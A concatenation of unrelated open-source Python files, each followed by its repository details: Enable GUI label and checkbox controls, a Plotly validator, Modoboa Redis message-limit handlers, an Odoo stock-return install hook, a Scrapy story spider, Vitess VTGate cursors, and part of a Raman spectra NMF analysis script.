#---------------------------------------------------------------------------
def update_text ( self ):
text = self.text
if text == '':
self._text = []
self._tdx = []
self._max_tdx = self._tdy = 0
else:
self._text = _text = text.split( '\n' )
gc = self.gc_temp()
gc.set_font( self.font )
max_tdx = 0
self._tdx = _tdx = [ 0 ] * len( _text )
for i, text in enumerate( _text ):
tdx, tdy, descent, leading = gc.get_full_text_extent( text )
tdy += descent + 5
max_tdx = max( max_tdx, tdx )
_tdx[i] = tdx
self._max_tdx = max_tdx
self._tdy = tdy
#---------------------------------------------------------------------------
# Layout and compute the minimum size of the control:
#---------------------------------------------------------------------------
def layout ( self ):
sdx = self.spacing_width
sdy = self.spacing_height
n = len( self._text )
if n == 0:
tdx = tdy = sdx = sdy = 0
else:
tdx = self._max_tdx
tdy = self._tdy * n
image = self._image
if image is not None:
idx = image.width()
idy = image.height()
else:
idx = idy = sdx = sdy = 0
image_position = self.image_position_
if image_position & LEFT_OR_RIGHT:
itdx = tdx + sdx + idx
if image_position & LEFT:
ix = 0
tx = idx + sdx
else:
tx = 0
ix = tdx + sdx
else:
itdx = max( tdx, idx )
ix = (itdx - idx) / 2.0
tx = (itdx - tdx) / 2.0
if image_position & TOP_OR_BOTTOM:
itdy = tdy + sdy + idy
if image_position & TOP:
iy = tdy + sdy
ty = 0
else:
iy = 0
ty = idy + sdy
else:
itdy = max( tdy, idy )
iy = (itdy - idy) / 2.0
ty = (itdy - tdy) / 2.0
bs = 2 * self.border_size
self.min_width = itdx + (self.margin_left + self.margin_right +
self.padding_left + self.padding_right + bs)
self.min_height = itdy + (self.margin_top + self.margin_bottom +
self.padding_top + self.padding_bottom + bs)
self._info = ( ix, iy, idx, idy, tx, ty, tdx, self._tdy, itdx, itdy )
#---------------------------------------------------------------------------
# Draw the contents of the control:
#---------------------------------------------------------------------------
def _draw ( self, gc, view_bounds, mode):
# Set up all the control variables for quick access:
ml = self.margin_left
mr = self.margin_right
mt = self.margin_top
mb = self.margin_bottom
pl = self.padding_left
pr = self.padding_right
pt = self.padding_top
pb = self.padding_bottom
bs = self.border_size
bsd = bs + bs
bsh = bs / 2.0
x, y, dx, dy = self.bounds
ix, iy, idx, idy, tx, ty, tdx, tdy, itdx, itdy = self._info
# Fill the background region (if required);
bg_color = self.bg_color_
if bg_color is not transparent_color:
with gc:
gc.set_fill_color( bg_color )
gc.begin_path()
gc.rect( x + ml + bs, y + mb + bs,
dx - ml - mr - bsd, dy - mb - mt - bsd )
gc.fill_path()
# Draw the border (if required):
if bs > 0:
border_color = self.border_color_
if border_color is not transparent_color:
with gc:
gc.set_stroke_color( border_color )
gc.set_line_width( bs )
gc.begin_path()
gc.rect( x + ml + bsh, y + mb + bsh,
dx - ml - mr - bs, dy - mb - mt - bs )
gc.stroke_path()
# Calculate the origin of the image/text box:
text_position = self.text_position_
if self.image_orientation == 'text':
# Handle the 'image relative to text' case:
if text_position & RIGHT:
itx = x + dx - mr - bs - pr - itdx
else:
itx = x + ml + bs + pl
if text_position & HCENTER:
itx += (dx - ml - mr - bsd - pl - pr - itdx) / 2.0
if text_position & TOP:
ity = y + dy - mt - bs - pt - itdy
else:
ity = y + mb + bs + pb
if text_position & VCENTER:
ity += (dy - mb - mt - bsd - pb - pt - itdy) / 2.0
else:
# Handle the 'image relative to component' case:
itx = ity = 0.0
if text_position & RIGHT:
tx = x + dx - mr - bs - pr - tdx
else:
tx = x + ml + bs + pl
if text_position & HCENTER:
tx += (dx - ml - mr - bsd - pl - pr - tdx) / 2.0
if text_position & TOP:
ty = y + dy - mt - bs - pt - tdy
else:
ty = y + mb + bs + pb
if text_position & VCENTER:
ty += (dy - mb - mt - bsd - pb - pt - tdy) / 2.0
image_position = self.image_position_
if image_position & RIGHT:
ix = x + dx - mr - bs - pr - idx
else:
ix = x + ml + bs + pl
if image_position & HCENTER:
ix += (dx - ml - mr - bsd - pl - pr - idx) / 2.0
if image_position & TOP:
iy = y + dy - mt - bs - pt - idy
else:
iy = y + mb + bs + pb
if image_position & VCENTER:
iy += (dy - mb - mt - bsd - pb - pt - idy) / 2.0
with gc:
# Draw the image (if required):
image = self._image
if image is not None:
gc.draw_image( image, ( itx + ix, ity + iy, idx, idy ) )
# Draw the text (if required):
gc.set_font( self.font )
_text = self._text
_tdx = self._tdx
tx += itx
ty += ity + tdy * len( _text )
style = self.style_
shadow_color = self.shadow_color_
text_color = self.color_
for i, text in enumerate( _text ):
ty -= tdy
_tx = tx
if text_position & RIGHT:
_tx += tdx - _tdx[i]
elif text_position & HCENTER:
_tx += (tdx - _tdx[i]) / 2.0
# Draw the 'shadow' text, if requested:
if (style != 0) and (shadow_color is not transparent_color):
if style == EMBOSSED:
gc.set_fill_color( shadow_color )
gc.set_text_position( _tx - 1.0, ty + 1.0 )
elif style == ENGRAVED:
gc.set_fill_color( shadow_color )
gc.set_text_position( _tx + 1.0, ty - 1.0 )
else:
gc.set_fill_color( shadow_color )
gc.set_text_position( _tx + 2.0, ty - 2.0 )
gc.show_text( text )
# Draw the normal text:
gc.set_fill_color( text_color )
gc.set_text_position( _tx, ty )
gc.show_text( text )
#-- Pickling Protocol ----------------------------------------------------------
def __getstate__ ( self ):
dict = self.__dict__.copy()
try:
del dict[ '_image' ]
except:
pass
return dict
def __setstate__ ( self, state ):
self.__dict__.update( state )
self.image = self.image
#-------------------------------------------------------------------------------
# 'CheckBox' class:
#-------------------------------------------------------------------------------
class CheckBox ( Label ):
#---------------------------------------------------------------------------
# Trait definitions:
#---------------------------------------------------------------------------
image_base = Str( '=checkbox' )
#---------------------------------------------------------------------------
# Trait editor definition:
#---------------------------------------------------------------------------
position = Group( '<position>', 'image_base' )
#---------------------------------------------------------------------------
# Initialize the object:
#---------------------------------------------------------------------------
def __init__ ( self, text = '', **traits ):
Label.__init__( self, text, **traits )
self._select_image()
#---------------------------------------------------------------------------
# Select the correct image to display:
#---------------------------------------------------------------------------
def _select_image ( self, *suffixes ):
if len( suffixes ) == 0:
suffixes = [ self._suffix() ]
base, ext = os.path.splitext( self.image_base )
for suffix in suffixes:
image = '%s%s%s' % ( base, suffix, ext )
if self.image_for( image ) is not None:
self.image = image
break
#---------------------------------------------------------------------------
# Select the image suffix based on the current selection state:
#---------------------------------------------------------------------------
def _suffix ( self ):
return [ '', '_on' ][ self.selected ]
#---------------------------------------------------------------------------
# Set the selection state of the component:
#---------------------------------------------------------------------------
def _select ( self ):
self.selected = not self.selected
#---------------------------------------------------------------------------
# Handle the 'selected' status of the checkbox being changed:
#---------------------------------------------------------------------------
def _selected_changed ( self ):
base = self._suffix()
self._select_image( base + [ '', '_over'][ self._over == True ], base )
#---------------------------------------------------------------------------
# Handle mouse events:
#---------------------------------------------------------------------------
def _left_down_changed ( self, event ):
event.handled = True
if self._in_margins( event.x, event.y ):
event.window.mouse_owner = self
base = self._suffix()
self._select_image( base + '_down', base )
self._down = True
def _left_dclick_changed ( self, event ):
self._left_down_changed( event )
def _left_up_changed ( self, event ):
event.handled = True
event.window.mouse_owner = self._down = None
if self._in_margins( event.x, event.y ):
self._select()
def _mouse_move_changed ( self, event ):
event.handled = True
self._over = self._in_margins( event.x, event.y )
if self._over:
event.window.mouse_owner = self
base = self._suffix()
self._select_image(
base + [ '_over', '_down' ][ self._down is not None ], base )
else:
if self._down is None:
event.window.mouse_owner = None
self._select_image()
#-------------------------------------------------------------------------------
# 'RadioButton' class:
#-------------------------------------------------------------------------------
class Radio ( CheckBox, RadioStyle ):
#---------------------------------------------------------------------------
# Trait definitions:
#---------------------------------------------------------------------------
image_base = Str( '=radio' )
#---------------------------------------------------------------------------
# Set the selection state of the component:
#---------------------------------------------------------------------------
def _select ( self ):
self.selected = True
#---------------------------------------------------------------------------
# Handle the container the component belongs to being changed:
#---------------------------------------------------------------------------
def _container_changed ( self, old, new ):
CheckBox._container_changed( self )
if self.radio_group is old.radio_group:
self.radio_group = None
if self.radio_group is None:
if new.radio_group is None:
new.radio_group = RadioGroup()
new.radio_group.add( self )
#---------------------------------------------------------------------------
# Handle the 'selected' status of the checkbox being changed:
#---------------------------------------------------------------------------
def _selected_changed ( self ):
CheckBox._selected_changed( self )
if self.selected:
self.radio_group.selection = self
|
tommy-u/enable
|
enable/controls.py
|
Python
|
bsd-3-clause
| 22,474 | 0.02207 |
import _plotly_utils.basevalidators
class BordercolorValidator(_plotly_utils.basevalidators.ColorValidator):
def __init__(
self, plotly_name="bordercolor", parent_name="sankey.hoverlabel", **kwargs
):
super(BordercolorValidator, self).__init__(
plotly_name=plotly_name,
parent_name=parent_name,
array_ok=kwargs.pop("array_ok", True),
edit_type=kwargs.pop("edit_type", "calc"),
**kwargs
)
|
plotly/plotly.py
|
packages/python/plotly/plotly/validators/sankey/hoverlabel/_bordercolor.py
|
Python
|
mit
| 482 | 0.002075 |
"""App related signal handlers."""
import redis
from django.conf import settings
from django.db.models import signals
from django.dispatch import receiver
from modoboa.admin import models as admin_models
from . import constants
def set_message_limit(instance, key):
"""Store message limit in Redis."""
old_message_limit = instance._loaded_values.get("message_limit")
if old_message_limit == instance.message_limit:
return
rclient = redis.Redis(
host=settings.REDIS_HOST,
port=settings.REDIS_PORT,
db=settings.REDIS_QUOTA_DB
)
if instance.message_limit is None:
# delete existing key
if rclient.hexists(constants.REDIS_HASHNAME, key):
rclient.hdel(constants.REDIS_HASHNAME, key)
return
if old_message_limit is not None:
diff = instance.message_limit - old_message_limit
else:
diff = instance.message_limit
rclient.hincrby(constants.REDIS_HASHNAME, key, diff)
@receiver(signals.post_save, sender=admin_models.Domain)
def set_domain_message_limit(sender, instance, created, **kwargs):
"""Store domain message limit in Redis."""
set_message_limit(instance, instance.name)
@receiver(signals.post_save, sender=admin_models.Mailbox)
def set_mailbox_message_limit(sender, instance, created, **kwargs):
"""Store mailbox message limit in Redis."""
set_message_limit(instance, instance.full_address)
|
modoboa/modoboa
|
modoboa/policyd/handlers.py
|
Python
|
isc
| 1,435 | 0 |
# Copyright 2019 Tecnativa - David
# License AGPL-3.0 or later (http://www.gnu.org/licenses/agpl).
import logging
from odoo import SUPERUSER_ID, api
_logger = logging.getLogger(__name__)
def pre_init_hook(cr):
"""Speed up the installation of the module on an existing Odoo instance"""
cr.execute(
"""
SELECT column_name
FROM information_schema.columns
WHERE table_name='stock_move' AND
column_name='qty_returnable'
"""
)
if not cr.fetchone():
_logger.info("Creating field qty_returnable on stock_move")
cr.execute(
"""
ALTER TABLE stock_move ADD COLUMN qty_returnable float;
"""
)
cr.execute(
"""
UPDATE stock_move SET qty_returnable = 0
WHERE state IN ('draft', 'cancel')
"""
)
cr.execute(
"""
UPDATE stock_move SET qty_returnable = product_uom_qty
WHERE state = 'done'
"""
)
def post_init_hook(cr, registry):
"""Set moves returnable qty on hand"""
with api.Environment.manage():
env = api.Environment(cr, SUPERUSER_ID, {})
moves_draft = env["stock.move"].search([("state", "in", ["draft", "cancel"])])
moves_no_return_pendant = env["stock.move"].search(
[
("returned_move_ids", "=", False),
("state", "not in", ["draft", "cancel", "done"]),
]
)
moves_by_reserved_availability = {}
for move in moves_no_return_pendant:
moves_by_reserved_availability.setdefault(move.reserved_availability, [])
moves_by_reserved_availability[move.reserved_availability].append(move.id)
for qty, ids in moves_by_reserved_availability.items():
cr.execute(
"UPDATE stock_move SET qty_returnable = %s " "WHERE id IN %s",
(qty, tuple(ids)),
)
moves_no_return_done = env["stock.move"].search(
[
("returned_move_ids", "=", False),
("state", "=", "done"),
]
)
# Recursively solve quantities
updated_moves = moves_no_return_done + moves_draft + moves_no_return_pendant
remaining_moves = env["stock.move"].search(
[
("returned_move_ids", "!=", False),
("state", "=", "done"),
]
)
while remaining_moves:
_logger.info("{} moves left...".format(len(remaining_moves)))
remaining_moves, updated_moves = update_qty_returnable(
cr, remaining_moves, updated_moves
)
def update_qty_returnable(cr, remaining_moves, updated_moves):
for move in remaining_moves:
if all([x in updated_moves for x in move.returned_move_ids]):
quantity_returned = sum(move.returned_move_ids.mapped("qty_returnable"))
quantity = move.product_uom_qty - quantity_returned
cr.execute(
"UPDATE stock_move SET qty_returnable = %s " "WHERE id = %s",
(quantity, move.id),
)
remaining_moves -= move
updated_moves += move
return remaining_moves, updated_moves
|
OCA/stock-logistics-workflow
|
stock_return_request/hooks.py
|
Python
|
agpl-3.0
| 3,276 | 0.001526 |
# -*- coding:utf8 -*-
from scrapy import Request
from scrapy.spiders import CrawlSpider, Rule
from scrapy.linkextractors import LinkExtractor
from scrapy.loader.processors import Join
from scrapy.loader import ItemLoader
from scrapy.selector import HtmlXPathSelector, Selector
from zadolbali.items import StoryItem
class StoryLoader(ItemLoader):
default_output_processor = Join(' ')
class StoriesSpider(CrawlSpider):
name = 'stories'
allowed_domains = ['zadolba.li']
start_urls = ['http://zadolba.li/']
rules = (
Rule(LinkExtractor(allow=('/[0-9]{8}', )), callback='parse_day', follow=True),
)
def parse_day(self, response):
for url in response.xpath('//div[@class="story"]/h2/a/@href').extract():
request = Request(StoriesSpider.start_urls[0] + str(url)[1:], callback=self.parse_story)
request.meta['date'] = response.url.split('/')[-1]
yield request
def parse_story(self, response):
hxs = HtmlXPathSelector(response)
loader = StoryLoader(StoryItem(), hxs)
loader.add_xpath('id', '//div[@class="story"]/div[@class="id"]/span/text()')
loader.add_xpath('title', '//div[@class="story"]/h1/text()')
loader.add_value('published', str(response.request.meta['date']))
loader.add_xpath('tags', '//div[@class="story"]/div[@class="meta"]/div[@class="tags"]/ul/li/a/@href')
loader.add_xpath('text', 'string(//div[@class="story"]/div[@class="text"])')
loader.add_xpath('likes', 'string(//div[@class="story"]/div[@class="actions"]//div[@class="rating"])')
loader.add_xpath('hrefs', '//div[@class="story"]/div[@class="text"]//a/@href')
loader.add_value('hrefs', '')
loader.add_value('url', str(response.url))
return loader.load_item()
|
alexeyqu/zadolbali_corpus
|
crawler/zadolbali/zadolbali/spiders/stories.py
|
Python
|
mit
| 1,809 | 0.006081 |
# Copyright 2012, Google Inc. All rights reserved.
# Use of this source code is governed by a BSD-style license that can
# be found in the LICENSE file.
"""VTGateCursor, and StreamVTGateCursor."""
import itertools
import operator
import re
from vtdb import base_cursor
from vtdb import dbexceptions
write_sql_pattern = re.compile(r'\s*(insert|update|delete)', re.IGNORECASE)
def ascii_lower(string):
"""Lower-case, but only in the ASCII range."""
return string.encode('utf8').lower().decode('utf8')
class VTGateCursorMixin(object):
def connection_list(self):
return [self._conn]
def is_writable(self):
return self._writable
class VTGateCursor(base_cursor.BaseListCursor, VTGateCursorMixin):
"""A cursor for execute statements to VTGate.
Results are stored as a list.
"""
def __init__(
self, connection, tablet_type, keyspace=None,
shards=None, keyspace_ids=None, keyranges=None,
writable=False, as_transaction=False, single_db=False,
twopc=False):
"""Init VTGateCursor.
Args:
connection: A PEP0249 connection object.
tablet_type: Str tablet_type.
keyspace: Str keyspace or None if batch API will be used.
shards: List of strings.
keyspace_ids: Struct('!Q').packed keyspace IDs.
keyranges: Str keyranges.
writable: True if writable.
as_transaction: True if an executemany call is its own transaction.
single_db: True if single db transaction is needed.
twopc: True if 2-phase commit is needed.
"""
super(VTGateCursor, self).__init__(single_db=single_db, twopc=twopc)
self._conn = connection
self._writable = writable
self.description = None
self.index = None
self.keyspace = keyspace
self.shards = shards
self.keyspace_ids = keyspace_ids
self.keyranges = keyranges
self.lastrowid = None
self.results = None
self.routing = None
self.rowcount = 0
self.tablet_type = tablet_type
self.as_transaction = as_transaction
self._clear_batch_state()
# pass kwargs here in case higher level APIs need to push more data through
# for instance, a key value for shard mapping
def execute(self, sql, bind_variables, **kwargs):
"""Perform a query, return the number of rows affected."""
self._clear_list_state()
self._clear_batch_state()
if self._handle_transaction_sql(sql):
return
entity_keyspace_id_map = kwargs.pop('entity_keyspace_id_map', None)
entity_column_name = kwargs.pop('entity_column_name', None)
write_query = bool(write_sql_pattern.match(sql))
# NOTE: This check may also be done at higher layers but adding it
# here for completion.
if write_query:
if not self.is_writable():
raise dbexceptions.ProgrammingError('DML on a non-writable cursor', sql)
if entity_keyspace_id_map:
raise dbexceptions.ProgrammingError(
'entity_keyspace_id_map is not allowed for write queries')
# FIXME(alainjobart): the entity_keyspace_id_map should be in the
# cursor, same as keyspace_ids, shards, keyranges, to avoid this hack.
if entity_keyspace_id_map:
shards = None
keyspace_ids = None
keyranges = None
else:
shards = self.shards
keyspace_ids = self.keyspace_ids
keyranges = self.keyranges
self.results, self.rowcount, self.lastrowid, self.description = (
self.connection._execute( # pylint: disable=protected-access
sql,
bind_variables,
tablet_type=self.tablet_type,
keyspace_name=self.keyspace,
shards=shards,
keyspace_ids=keyspace_ids,
keyranges=keyranges,
entity_keyspace_id_map=entity_keyspace_id_map,
entity_column_name=entity_column_name,
not_in_transaction=not self.is_writable(),
effective_caller_id=self.effective_caller_id,
**kwargs))
return self.rowcount
def fetch_aggregate_function(self, func):
return func(row[0] for row in self.fetchall())
def fetch_aggregate(self, order_by_columns, limit):
"""Fetch from many shards, sort, then remove sort columns.
A scatter query may return up to limit rows. Sort all results
manually order them, and return the first rows.
This is a special-use function.
Args:
order_by_columns: The ORDER BY clause. Each element is either a
column, [column, 'ASC'], or [column, 'DESC'].
limit: Int limit.
Returns:
Smallest rows, with up to limit items. First len(order_by_columns)
columns are stripped.
"""
sort_columns = []
desc_columns = []
for order_clause in order_by_columns:
if isinstance(order_clause, (tuple, list)):
sort_columns.append(order_clause[0])
if ascii_lower(order_clause[1]) == 'desc':
desc_columns.append(order_clause[0])
else:
sort_columns.append(order_clause)
# sort the rows and then trim off the prepended sort columns
if sort_columns:
sorted_rows = list(sort_row_list_by_columns(
self.fetchall(), sort_columns, desc_columns))[:limit]
else:
sorted_rows = itertools.islice(self.fetchall(), limit)
neutered_rows = [row[len(order_by_columns):] for row in sorted_rows]
return neutered_rows
def _clear_batch_state(self):
"""Clear state that allows traversal to next query's results."""
self.result_sets = []
self.result_set_index = None
def close(self):
super(VTGateCursor, self).close()
self._clear_batch_state()
def executemany(self, sql, params_list, **kwargs):
"""Execute multiple statements in one batch.
This adds len(params_list) result_sets to self.result_sets. Each
result_set is a (results, rowcount, lastrowid, fields) tuple.
Each call overwrites the old result_sets. After execution, nextset()
is called to move the fetch state to the start of the first
result set.
Args:
sql: The sql text, with %(format)s-style tokens. May be None.
params_list: A list of the keyword params that are normally sent
to execute. Either the sql arg or params['sql'] must be defined.
**kwargs: passed as is to connection._execute_batch.
"""
if sql:
sql_list = [sql] * len(params_list)
else:
sql_list = [params.get('sql') for params in params_list]
bind_variables_list = [params['bind_variables'] for params in params_list]
keyspace_list = [params['keyspace'] for params in params_list]
keyspace_ids_list = [params.get('keyspace_ids') for params in params_list]
shards_list = [params.get('shards') for params in params_list]
self._clear_batch_state()
# Find other _execute_batch calls in test code.
self.result_sets = self.connection._execute_batch( # pylint: disable=protected-access
sql_list, bind_variables_list, keyspace_list, keyspace_ids_list,
shards_list,
self.tablet_type, self.as_transaction, self.effective_caller_id,
**kwargs)
self.nextset()
def nextset(self):
"""Move the fetch state to the start of the next result set.
self.(results, rowcount, lastrowid, description) will be set to
the next result_set, and the fetch-commands will work on this
result set.
Returns:
True if another result set exists, False if not.
"""
if self.result_set_index is None:
self.result_set_index = 0
else:
self.result_set_index += 1
self._clear_list_state()
if self.result_set_index < len(self.result_sets):
self.results, self.rowcount, self.lastrowid, self.description = (
self.result_sets[self.result_set_index])
return True
else:
self._clear_batch_state()
return None
class StreamVTGateCursor(base_cursor.BaseStreamCursor, VTGateCursorMixin):
"""A cursor for streaming statements to VTGate.
Results are returned as a generator.
"""
def __init__(
self, connection, tablet_type, keyspace=None,
shards=None, keyspace_ids=None,
keyranges=None, writable=False):
super(StreamVTGateCursor, self).__init__()
self._conn = connection
self._writable = writable
self.keyspace = keyspace
self.shards = shards
self.keyspace_ids = keyspace_ids
self.keyranges = keyranges
self.routing = None
self.tablet_type = tablet_type
def is_writable(self):
return self._writable
# pass kwargs here in case higher level APIs need to push more data through
# for instance, a key value for shard mapping
def execute(self, sql, bind_variables, **kwargs):
"""Start a streaming query."""
if self._writable:
raise dbexceptions.ProgrammingError('Streaming query cannot be writable')
self._clear_stream_state()
self.generator, self.description = self.connection._stream_execute( # pylint: disable=protected-access
sql,
bind_variables,
tablet_type=self.tablet_type,
keyspace_name=self.keyspace,
shards=self.shards,
keyspace_ids=self.keyspace_ids,
keyranges=self.keyranges,
not_in_transaction=not self.is_writable(),
effective_caller_id=self.effective_caller_id,
**kwargs)
return 0
def sort_row_list_by_columns(row_list, sort_columns=(), desc_columns=()):
"""Sort by leading sort columns by stable-sorting in reverse-index order."""
for column_index, column_name in reversed(
[x for x in enumerate(sort_columns)]):
og = operator.itemgetter(column_index)
if not isinstance(row_list, list):
row_list = sorted(
row_list, key=og, reverse=bool(column_name in desc_columns))
else:
row_list.sort(key=og, reverse=bool(column_name in desc_columns))
return row_list
|
theskyinflames/bpulse-go-client
|
vendor/github.com/youtube/vitess/py/vtdb/vtgate_cursor.py
|
Python
|
apache-2.0
| 9,742 | 0.005646 |
import sys,os, pickle, numpy, pylab, operator, itertools
import cv2
from shutil import copy as copyfile
from PyQt4.QtCore import *
from PyQt4.QtGui import *
import matplotlib.pyplot as plt
from DataParseApp import dataparseDialog
from sklearn.decomposition import NMF
projectpath=os.path.split(os.path.abspath(__file__))[0]
sys.path.append(os.path.join(projectpath,'ui'))
pythoncodepath=os.path.split(projectpath)[0]
jcapdataprocesspath=os.path.join(pythoncodepath, 'JCAPDataProcess')
sys.path.append(jcapdataprocesspath)
from VisualizeDataApp import visdataDialog
sys.path.append(os.path.join(jcapdataprocesspath,'AuxPrograms'))
from fcns_ui import *
from fcns_io import *
platemapvisprocesspath=os.path.join(pythoncodepath, 'JCAPPlatemapVisualize')
sys.path.append(platemapvisprocesspath)
from plate_image_align_Dialog import plateimagealignDialog
import numpy as np
###############UPDATE THIS TO BE THE FOLDER CONTAINING parameters.py
paramsfolder=r'K:\users\hte\Raman\39664\20170607analysis_tippy-top_1mmblobs'
#paramsfolder=r'K:\users\hte\Raman\33444\20170608analysis'
#if not paramsfolder is None:
sys.path.append(paramsfolder)
from parameters import *
#else:
# plateidstr='3344'
#
# pathd={'ramanfile':r'K:\users\hte\Raman\33444\HSS_33444_map-1-_CRR-EM-copy.txt'}
# pathd['mainfolder']=os.path.split(pathd['ramanfile'])[0]
# pathd['savefolder']=os.path.join(pathd['mainfolder'], '20170607analysis')
# pathd['infopck']=pathd['ramanfile'][:-4]+'__info.pck'
# pathd['allspectra']=os.path.join(pathd['savefolder'],'allspectra.npy')
# pathd['nmfdata']=os.path.join(pathd['savefolder'],'nmf4.pck')
# pathd['edges']=os.path.join(pathd['savefolder'],'edges.png')
# pathd['mapfill']=os.path.join(pathd['savefolder'],'blobmap.png')
# pathd['blobd']=os.path.join(pathd['savefolder'],'blobd.pck')
# pathd['alignedsamples']=os.path.join(pathd['savefolder'],'alignedsamples.png')
# pathd['alignedsamplestxt']=os.path.join(pathd['savefolder'],'alignedsamples.txt')
# pathd['spectrafolder']=os.path.join(pathd['savefolder'],'sample_spectra')
# pathd['map']=os.path.join(pathd['spectrafolder'],'raman_sample_index_map.map')
# pathd['samplepixels']=os.path.join(pathd['spectrafolder'],'samplepixels.png')
# pathd['udibasepath']=os.path.join(pathd['savefolder'],'ave_rmn_')
#
# udi_ternary_projection_inds=[0, 1, 2]#only used for the all.udi file
#
# sample_list=[1850,1851,1852,1853,1854,1855,1905,1906,1907,1908,1909,1910,1911,1912,1913,1914,1915,1916,1917,1918,1919,1969,1970,1971,1972,1973,1974,1975,1976,1977,1978,1979,1980,1981,1982,1983,2033,2034,2035,2036,2037,2038,2039,2040,2041,2042,2043,2044,2045,2046,2047,2097,2098,2099,2100,2101,2102,2103,2104,2105,2106,2107,2108,2109,2110,2111]
# dx_smp=1.
# dy_smp=1.
#
# default_sample_blob_dict=dict({}, \
# smp_is_square=0, smp_width=1., bcknd_is_square=0, bcknd_min_width=1.3, bcknd_max_width=1.4, removedups=1\
# )
#
# show_help_messages=True
platemappath=getplatemappath_plateid(plateidstr)
if not os.path.isdir(pathd['mainfolder']):
print 'NOT A VALID FOLDER'
if not os.path.isdir(pathd['savefolder']):
os.mkdir(pathd['savefolder'])
if not os.path.isdir(pathd['spectrafolder']):
os.mkdir(pathd['spectrafolder'])
class MainMenu(QMainWindow):
def __init__(self, previousmm, execute=True, **kwargs):
super(MainMenu, self).__init__(None)
self.parseui=dataparseDialog(self, title='Visualize ANA, EXP, RUN data', **kwargs)
self.alignui=plateimagealignDialog(self, manual_image_init_bool=False)
if execute:
self.parseui.exec_()
def doNMF(datan,n_components=4):
# from Mitsu
#alternatively PCA ... might me faster
nmf=NMF(n_components=n_components,init='nndsvd')
data_decomp_all=nmf.fit_transform(datan)
data_components_all=nmf.components_
return data_decomp_all,data_components_all
def rgb_comp(arr2d, affine=True):
cmy_cmyk=lambda a:a[:3]*(1.-a[3])+a[3]
rgb_cmy=lambda a:1.-a
rgb_cmyk=lambda a:rgb_cmy(cmy_cmyk(a))
return numpy.array([rgb_cmyk(a) for a in arr2d])
def imGen(data_decomp_all,ramaninfod,cmykindeces=[3, 2, 1, 0]):
cmykvals=copy.copy(data_decomp_all[:, cmykindeces])
cmykvals/=cmykvals.max(axis=0)[numpy.newaxis, :]
img=numpy.reshape(rgb_comp(cmykvals), (ramaninfod['xshape'], ramaninfod['yshape'], 3))
return img
def findEdges(img_gray, sigma = 0.33):
#this uses automatic thresholding from one of the cv2 tutorials
v = np.median(img_gray[img_gray>0])
lower = int(max(0, (1.0 - sigma) * v))
upper = int(min(255, (1.0 + sigma) * v))
edges = cv2.Canny(np.uint8(img_gray),lower,upper)
return edges
def findContours(edges):
#the contours are now found by searching the most external convex hull
#this way mos of the not fully closed samples are detected as well
im2, contours, hierarchy = cv2.findContours(edges, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_TC89_KCOS)
iWithContour = cv2.drawContours(edges, contours, -1, (255,20,100), 5)
mapimage = np.zeros_like(edges)
#this fills the contours
for i in range(len(contours)):
cv2.drawContours(mapimage, contours, i, color=255, thickness=-1)
#this is to calculate the center of each contour
x=[]
y=[]
for c in contours:
# compute the center of the contour
M = cv2.moments(c)
try:
x.append(M['m10']/(M['m00']))
y.append(M['m01']/(M['m00']))
except:
#this was nessesary as the divisor is sometimes 0
#yield good results but should be done with caution
x.append(M['m10']/(M['m00']+1e-23))
y.append(M['m01']/(M['m00']+1e-23))
return iWithContour, mapimage, contours, x, y
mainapp=QApplication(sys.argv)
form=MainMenu(None, execute=False)
#form.show()
#form.setFocus()
#mainapp.exec_()
parseui=form.parseui
alignui=form.alignui
parseui.rawpathLineEdit.setText(pathd['ramanfile'])
parseui.infopathLineEdit.setText(pathd['infopck'])
parseui.getinfo(ramaninfop=pathd['infopck'], ramanfp=pathd['ramanfile'])#opens or creates
if os.path.isfile(pathd['allspectra']):
with open(pathd['allspectra'], mode='rb') as f:
fullramandataarray=numpy.load(f)
elif 1:
fullramandataarray=parseui.readfullramanarray(pathd['ramanfile'])#opens or creates
with open(pathd['allspectra'], mode='wb') as f:
numpy.save(f, fullramandataarray)
ramaninfod=parseui.ramaninfod
#parseui.exec_()
#ramaninfod['number of spectra']
#ramaninfod['xdata']
#ramaninfod['ydata']
#ramaninfod['Wavenumbers_str']
#ramaninfod['Spectrum 0 index']
ramaninfod['xdata']/=1000.
ramaninfod['ydata']/=1000.#convert to mm
ramaninfod['xshape']= len(np.unique(ramaninfod['xdata']))
ramaninfod['yshape']= len(np.unique(ramaninfod['ydata']))
ramaninfod['dx']= (ramaninfod['xdata'].max()-ramaninfod['xdata'].min())/(ramaninfod['xshape']-1)
ramaninfod['dy']= (ramaninfod['ydata'].max()-ramaninfod['ydata'].min())/(ramaninfod['yshape']-1)
nx=dx_smp/ramaninfod['dx']
ny=dy_smp/ramaninfod['dy']
ntot=nx*ny
ramanreshape=lambda arr: np.reshape(arr, (ramaninfod['xshape'], ramaninfod['yshape'])).T[::-1, ::-1]
ramannewshape=(ramaninfod['yshape'], ramaninfod['xshape'])
image_of_x=ramanreshape(ramaninfod['xdata'])
image_of_y=ramanreshape(ramaninfod['ydata'])
#extent=[ramaninfod['xdata'].max(), ramaninfod['xdata'].min(), ramaninfod['ydata'].min(), ramaninfod['ydata'].max()]
#extent=[ramaninfod['xdata'].max(), ramaninfod['xdata'].min(), ramaninfod['ydata'].max(), ramaninfod['ydata'].min()]
extent=[image_of_x[0, 0], image_of_x[-1, -1], image_of_y[0, 0], image_of_y[-1, -1]]
def ramanimshow(im, **kwargs):
plt.imshow(im, origin='lower', interpolation='none', aspect=1, extent=extent, **kwargs)
if os.path.isfile(pathd['nmfdata']):
with open(pathd['nmfdata'], mode='rb') as f:
tempd=pickle.load(f)
data_decomp_all,data_components_all,rgbimagedata=[tempd[k] for k in 'data_decomp_all,data_components_all,rgbimagedata'.split(',')]
else:
data_decomp_all,data_components_all = doNMF(fullramandataarray,4)
#rgbimagedata=imGen(data_decomp_all,ramaninfod)
rgbimagedata=np.zeros(ramannewshape+(3,), dtype='float32')
for i, arr in enumerate(data_decomp_all[:, :3].T):
if nmf_scaling_algorithm_for_image=='scale_by_max':
arr/=arr.max()
elif nmf_scaling_algorithm_for_image=='scale_log_by_max':
arr[arr!=0]=numpy.log10(arr[arr!=0])
arr/=arr.max()
rgbimagedata[:, :, i]=np.array([ramanreshape(arr)])
tempd={}
tempd['data_decomp_all']=data_decomp_all
tempd['data_components_all']=data_components_all
tempd['rgbimagedata']=rgbimagedata
with open(pathd['nmfdata'], mode='wb') as f:
tempd=pickle.dump(tempd, f)
#plt.clf()
#rgbimagedata=np.zeros(ramannewshape+(3,), dtype='float32')
#for i, arr in enumerate(data_decomp_all[:, :3].T):
